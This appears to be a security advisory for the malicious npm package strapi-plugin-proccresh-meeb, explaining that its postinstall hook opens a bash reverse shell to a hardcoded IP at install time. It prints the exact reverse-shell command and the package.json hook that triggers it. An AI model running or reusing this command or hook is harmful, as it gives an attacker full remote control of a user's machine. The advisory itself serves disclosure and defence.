VYPR

npm · Malicious package advisory

Malware

strapi-plugin-proccresh-meeb

GHSA-46m5-637h-jmhh

Malicious code in strapi-plugin-proccresh-meeb (npm)

Details

**Severity:** Critical

**Affected versions:** `= 3.6.8`

## Source: amazon-inspector (c65ca459d74b0be577eb0a1476ec8b9de089a524019ea9ef0061c5ee42e00729)
strapi-plugin-proccresh-meeb ships a postinstall dropper that opens a bash reverse shell to the hardcoded IP 14.225.210.85 on TCP/443 at npm install time. package.json declares `"scripts": { "postinstall": "node postinstall.js" }` and `"main": "postinstall.js"`, so both `npm install` and any `require()` of the package unconditionally execute `postinstall.js`, which runs `bash -c 'bash -i > /dev/tcp/14.225.210.85/443 0>&1'`, connecting the installer's shell stdio to the attacker-controlled host. The package's own description self-identifies as `Reverse shell payload for Strapi`. Result is full interactive remote code execution on the installer's machine with no user interaction.

---

Credit: [OpenSSF](https://github.com/ossf/malicious-packages) ([source](https://github.com/ossf/malicious-packages/blob/9947fca3b118619628d7c35349b0b5d2b1852e1c/osv/malicious/npm/strapi-plugin-proccresh-meeb/MAL-2026-16182.json))

**References:**
- https://github.com/ossf/malicious-packages/blob/9947fca3b118619628d7c35349b0b5d2b1852e1c/osv/malicious/npm/strapi-plugin-proccresh-meeb/MAL-2026-16182.json
- https://www.npmjs.com/package/strapi-plugin-proccresh-meeb/v/3.6.8
- https://github.com/advisories/GHSA-46m5-637h-jmhh

Compromised versions (1)

  • = 3.6.8

Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.